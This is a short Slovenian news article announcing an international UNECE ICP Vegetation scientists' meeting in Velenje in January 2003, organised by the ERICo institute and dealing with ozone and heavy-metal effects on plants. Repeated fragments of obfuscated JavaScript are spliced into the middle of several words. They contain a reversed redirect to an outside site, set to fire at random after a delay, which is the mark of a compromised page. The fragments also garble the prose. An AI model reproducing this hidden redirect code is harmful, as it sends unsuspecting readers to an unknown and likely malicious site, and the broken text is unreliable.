Mednarodno srečanje znanstvenikov v Velenju
Velenje – V velenjskem hotelu Paka bo med 27. in 30. januarjem 2003 potekalo mednarodno srečanje znanstvenikov in raziskovalcev, na katerem bo sodelovalo 44 raziskovalcev iz sedemnajstih držav.
16. srečanje »UNECE ICP Vegetation« delovne skupine letobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos organizira Inštitut za ekološke raziskave ERICo Velenje. ICP Vegetation je mednarodni program, ki deluje pod okriljem Združenih narodov, ukvarja pa se z vplivi zračnih onesnažil na naravno in kmetijsko vegetacijo.
Organizacija »ICP Vegetation« znanstvenega sestanka v Velenju sodi v okvir vsakoletnih srečanj, na katerih raziskovalci predstavijo rezultate preteklega leta in se dogovorijo o smernicah za raziskave v naslednjem letu. Pri tem upoštevajo priporočila in potrebe CLRTAP konvencije (Konvencije o prenosu onesnaženja zraka na velike razdalje preko meja).
Že od leta 1995 naprej v tem programu sodelujejo tudi raziskovalci Inštituta za ekološke raziskave ERICo Velenje in raziskovalci Oddelka za agronomijo Biotehniške fakultete Univerze v Ljubljani. Največ zaslug za podporo raziskavam, ki jih v okviru ICP Vegetation programa v Sloveniji vodi prof. dr. Franc Batič, ima Termoelektrarna Šoštanj.
Namen mednarodnega znanstvenega srečanja v Velenju je predvsem spodbuditi aktivnejše vključevanje naših raziskovalcev in njihovih rezultatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tov v ICP Vegetation program. Takšno srečanje je tudi dobra priložnost za začetek novih sodelovanj pri drugih mednarodnih projektih (npr. LIFE, 6. okvirni program …, ki jih bo v prihodnosti sofinancirala Evropska unija. Preko teh mednarodnih programov se lahko rezultati slovenskih raziskav vključujejo v skupno bazo podatkov evropskih držav, kar je pomembno tudi zaradi približevanja Slovenije k Evropski uniji. Glavni cilj, zaradi katerega je inštitut ERICo srečanje tudi organiziral, pa je promocija znanstvenih dosežkov naših raziskovalcev na področju bioindikacije zračnih onesnažil, zlasti ozona in težkih kovin v rastlinah, in tudi promocija Slovenije v mednarodnih znanstvenih krogih.
Na znanstvenem sestanku bodo raziskovalci predstavili več referatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tov o onesnaževanju zraka z ozonom in s težkimi kovinami ter o odzivnosti rastlin na takšno onesnaženje. Na osnovi takšnih raziskav se določajo mednarodno veljavne kritične mejne vrednosti za posamezna zračna onesnažila, izdelujejo se računalniško statistični modeli za različne napovedi in karte o onesnaženosti zraka z ozonom, s težkimi kovinami in z drugimi zračnimi onesnažili v evropskem prostobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toru.
0 Comments